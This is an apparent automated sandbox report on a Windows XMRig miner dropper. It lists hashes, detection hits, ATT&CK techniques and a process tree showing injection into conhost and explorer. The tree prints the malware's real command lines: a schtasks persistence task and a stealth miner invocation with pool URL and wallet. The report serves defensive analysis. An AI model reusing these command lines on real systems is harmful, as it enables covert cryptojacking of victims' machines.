xmrig | 1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd

Analysis

max time kernel
149s
max time network
140s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/04/2024, 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe
Size

2.1MB
MD5

e9dd7614c25f98ff32d0c9383bdb7599
SHA1

69c2f6d9466a870f2a29b90db7e88d0f06979a47
SHA256

1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd
SHA512

97151c4ad0fa4408f73764f91e980b0cb0c236e8551b0bf197c9f5a0516ded05fb5ab4cd540644960eb6d31aa0c5d633051903b3f20e3b41897ffad6b000b7a8
SSDEEP

49152:bYemLzwiFT74xXx5gYz6gjFic5cgGREIvM4Uw:seYCx73jneJZP

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral1/memory/1152-29-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-31-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-32-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-33-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-34-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-35-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-36-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-37-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-40-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-44-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-46-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-48-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-49-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-47-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-50-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-52-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1152-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
2572	services64.exe
584	sihost64.exe

Loads dropped DLL 4 IoCs

pid	Process
2672	cmd.exe
2672	cmd.exe
2948	conhost.exe
2948	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2948 set thread context of 1152	2948	conhost.exe	40

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2632	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
1740	conhost.exe
2948	conhost.exe
2948	conhost.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe
1152	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1740	conhost.exe
Token: SeDebugPrivilege	2948	conhost.exe
Token: SeLockMemoryPrivilege	1152	explorer.exe
Token: SeLockMemoryPrivilege	1152	explorer.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 2332 wrote to memory of 1740	2332	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	28
PID 2332 wrote to memory of 1740	2332	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	28
PID 2332 wrote to memory of 1740	2332	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	28
PID 2332 wrote to memory of 1740	2332	e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe	28
PID 1740 wrote to memory of 2520	1740	conhost.exe	30
PID 1740 wrote to memory of 2520	1740	conhost.exe	30
PID 1740 wrote to memory of 2520	1740	conhost.exe	30
PID 2520 wrote to memory of 2632	2520	cmd.exe	32
PID 2520 wrote to memory of 2632	2520	cmd.exe	32
PID 2520 wrote to memory of 2632	2520	cmd.exe	32
PID 1740 wrote to memory of 2672	1740	conhost.exe	33
PID 1740 wrote to memory of 2672	1740	conhost.exe	33
PID 1740 wrote to memory of 2672	1740	conhost.exe	33
PID 2672 wrote to memory of 2572	2672	cmd.exe	35
PID 2672 wrote to memory of 2572	2672	cmd.exe	35
PID 2672 wrote to memory of 2572	2672	cmd.exe	35
PID 2572 wrote to memory of 2948	2572	services64.exe	38
PID 2572 wrote to memory of 2948	2572	services64.exe	38
PID 2572 wrote to memory of 2948	2572	services64.exe	38
PID 2572 wrote to memory of 2948	2572	services64.exe	38
PID 2948 wrote to memory of 584	2948	conhost.exe	39
PID 2948 wrote to memory of 584	2948	conhost.exe	39
PID 2948 wrote to memory of 584	2948	conhost.exe	39
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 2948 wrote to memory of 1152	2948	conhost.exe	40
PID 584 wrote to memory of 1692	584	sihost64.exe	41
PID 584 wrote to memory of 1692	584	sihost64.exe	41
PID 584 wrote to memory of 1692	584	sihost64.exe	41
PID 584 wrote to memory of 1692	584	sihost64.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e9dd7614c25f98ff32d0c9383bdb7599_JaffaCakes118.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      4⤵
      Creates scheduled task(s)
      PID:2632
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Users\Admin\AppData\Local\Temp\services64.exe
      C:\Users\Admin\AppData\Local\Temp\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2948
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:584
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:1692
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=46tF1GF7kHPa9JfVZ23MHCUaijLXmQd1WRnQoEMJSoWv7juuNWB9hzvEex9UUshieLPTz3X3mSz3MGxJ1gDyALWsQ6YNWeR --pass=STU --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
e9dd7614c25f98ff32d0c9383bdb7599

SHA1
69c2f6d9466a870f2a29b90db7e88d0f06979a47

SHA256
1146117f6c5ff1c1473ce4e3f6e91f3483b9fc3d8ffb6911b1d54f9f289857cd

SHA512
97151c4ad0fa4408f73764f91e980b0cb0c236e8551b0bf197c9f5a0516ded05fb5ab4cd540644960eb6d31aa0c5d633051903b3f20e3b41897ffad6b000b7a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
30KB

MD5
a3d93d0fb52c65278112cf3a19e79b35

SHA1
afa77a644526e379146a2c1306458233ab42a7d7

SHA256
478cdadb36ccabf7bf9d0051d6ce0b3cc5504c5234012774853bf08f63c90af6

SHA512
0afdbaef084937595bf26cb9b950450a2c10834a86a56cbd9457c7141ae2010f7ef8aeb127c327c1a2d2e46212f3d5cb5c2c154cad4501fad8b64297fe6d35a7

Download Submit
memory/1152-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-28-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-63-0x00000000003B0000-0x00000000003D0000-memory.dmp

Filesize
128KB

Download
memory/1152-62-0x0000000000140000-0x0000000000160000-memory.dmp

Filesize
128KB

Download
memory/1152-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-55-0x00000000003B0000-0x00000000003D0000-memory.dmp

Filesize
128KB

Download
memory/1152-44-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-54-0x0000000000140000-0x0000000000160000-memory.dmp

Filesize
128KB

Download
memory/1152-29-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-31-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-32-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-52-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-34-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-50-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-37-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-38-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/1152-40-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-27-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-26-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-33-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-48-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1152-45-0x0000000000100000-0x0000000000120000-memory.dmp

Filesize
128KB

Download
memory/1152-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1692-57-0x0000000001B20000-0x0000000001B26000-memory.dmp

Filesize
24KB

Download
memory/1692-56-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/1692-64-0x000007FEF5880000-0x000007FEF626C000-memory.dmp

Filesize
9.9MB

Download
memory/1692-65-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-68-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-67-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-60-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-66-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-59-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/1692-58-0x000007FEF5880000-0x000007FEF626C000-memory.dmp

Filesize
9.9MB

Download
memory/1740-12-0x000007FEF5880000-0x000007FEF626C000-memory.dmp

Filesize
9.9MB

Download
memory/1740-2-0x000007FEF5880000-0x000007FEF626C000-memory.dmp

Filesize
9.9MB

Download
memory/1740-6-0x000007FEF5880000-0x000007FEF626C000-memory.dmp

Filesize
9.9MB

Download
memory/1740-3-0x000000001B140000-0x000000001B1C0000-memory.dmp

Filesize
512KB

Download
memory/1740-1-0x000000001B3E0000-0x000000001B600000-memory.dmp

Filesize
2.1MB

Download
memory/1740-0-0x0000000000180000-0x00000000003A0000-memory.dmp

Filesize
2.1MB

Download
memory/1740-4-0x000000001B140000-0x000000001B1C0000-memory.dmp

Filesize
512KB

Download
memory/2948-14-0x000007FEF4E90000-0x000007FEF587C000-memory.dmp

Filesize
9.9MB

Download
memory/2948-43-0x000007FEF4E90000-0x000007FEF587C000-memory.dmp

Filesize
9.9MB

Download
memory/2948-16-0x000000001B190000-0x000000001B210000-memory.dmp

Filesize
512KB

Download
memory/2948-15-0x000000001B190000-0x000000001B210000-memory.dmp

Filesize
512KB

Download